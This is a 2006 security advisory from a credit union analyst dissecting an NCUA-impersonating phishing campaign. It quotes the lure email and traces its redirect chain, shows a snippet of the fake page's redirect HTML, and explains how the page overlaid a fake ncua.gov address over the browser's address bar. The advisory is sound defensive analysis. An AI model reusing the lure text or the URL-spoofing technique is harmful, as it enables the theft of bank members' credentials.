|
|
       
|
|
Announcements [View All]
NCUA Phish Using URL overlay code to fool members AUSTIN, TEXAS- February 10, 2006 Author: John Brozycki, CISSP Hudson Valley FCU ABSTRACT: A current NCUA (National Credit Union Administration) phish was observed on 2/8/2006. This phish attempts to get ANY credit union member to enter personal account information. This phish features several redirects, a drop down menu that includes more than 2,300 federal credit unions, as well as code to obscure the real URL and cover it with the apparent URL of the true ncua.gov website. The fake websites were taken down by 8:30am EST on 2/8/2006. ORIGINAL MESSAGE BODY: LEGAL NOTICE Message sent to you follows: Dear NCUA client, As part of our security measures, we regularly screen activity in Federal Credit Unions (FCU) network.For your protection, we have limited access to your account until additional security measures can be completed. We apologize for any inconvenience this may cause. Please log in to your FCU account to restore your access as soon as possible. We apologies for any inconvinience this may caused you and we strongly advise you to update your information you have on file with us. Please update in order to avoid any possible futuring billing problems with your account. Best regards, - NCUA Team. SUMMARY: This message was forwarded to us. Original headers are not available. The original email is html and the word UPDATE in the final sentence is a hyperlink to: “http://www.labs.cl/homepage.html” which in turn redirects to “http://www.addina.com/login/”. The addina.com page displays a “page loading” progress bar with instructions the user to click on a link if it doesn’t load, which it never does. It waits for the user to click on a link. It then appears to use a variable to direct to http://www.addina.com/login/, but it uses code to obscure the true URL in the address bar (or to hide the address bar, depending upon browser.) The form is set to forward information on a carriage return. It doesn’t have to wait for a POST action when the user clicks a submit button. As the server side PHP code is not accessible, no further information is available (ie: destination email addresses the information is likely submitted to.) The fake URL that the code uses to overlay the address field with is: “https://www.ncua.gov/cgi-bin/accounts.asp?act=update&uid=42341” Things to notice: there is no “lock” indicating an SSL connection even though the URL shows “https:”. Further, the title bar says “Welcome to VisionLine.” A view of your network socket connections (the netstat command in Windows) shows no port 443 connection and no connection to NCUA, only to www.addina.com (200.55.199.149.) The displayed image that is referenced in the email is actually hosted at the following link: “http://www.geocities.com/slutsd/BLUELAB.gif”. This geocities link is no longer valid. In the Safari browser, the URL address bar is hidden (apparently, it’s not easy to overlay text in the address bar with this browser.) In IE, if you click the URL address bar drop down menu the address bar is hidden. If you then select VIEW -> TOOLBARS -> ADDRESS BAR the address bar returns and you can see the true URL. Phishers have definitely taken it up a notch with this one! The site was taken down at roughly 8:30am EST. HVFCU had sent a cease and desist email to the addina.com domain. It us unknown if the site operators were previously aware of fake content being hosted on their server or if the removal was a result of this notification. CONCLUSIONS:
Below is a sample form screen from NCUA phish. Graphics are not present. This was recreated from cached data in an IE sandbox environment preserved after the site was taken down as the site was taken down before we got a screen shot. (Note: the [1] after the html file names below are added by IE when it downloads files but are generally not part of the real file name on the hosting server. It is used here for consistency.) 
The above screen shot is of “update[1].htm, which is the code for the form submission page. Note the drop down box for “bank name.” The list contains 2,354 federal credit unions, including Hudson Valley. Here’s a more detailed explanation of what it’s doing. 1) The html email link, which appears to be going to ncua.gov, really goes to http://www.labs.cl/homepage.html, which redirects to http://www.addina.com/login/. 2) The redirect to addina.com loads login[1].htm. This code appears to use a variable, from external code, to create a link to the desired URL. Nothing happens until the user clicks on the link. Please wait <img src="period_ani.gif"><br> <p class="notRedirected">(if you are not automatically redirected, click the following link)</p> <p class="pageMoved"><a href="javascript:redir('ncua_dll.php')">Click here</a> to redirect! 3) Clicking on the link results in the forwarding to http://www.addina.com/login/update.php. Although we can’t see what runs on the server side, we can see the effects from two of the html files. UPDATE[1].HTM produces the form page shown in the first screen shot, above. NCUA_DLL[1].HTM handles the fake URL. In fact, simply loading the NCUA_DLL[1].HTM from disk into the IE browser will yield the following: 
While this doesn’t look as intended, you can clearly see the faked address that is meant to overlay the true URL. Interestingly enough, this fake URL is actually a text box, not a graphic, so the user can click in it and type. It is not the real field. To view the client side code examine the file ncua_dll[1].htm. Note: the following files should be attached with this document: Login[1].htm (presents the “click here if page doesn’t load” page.) Update[1].htm (form entry page to gather personal account information.) Ncua_dll[1].htm (creates fake URL over address bar field.) Pdownclick[1].htm (appears to provide a 404 message but exact functionality is not known.) |
|
|
 |
|||||||||||
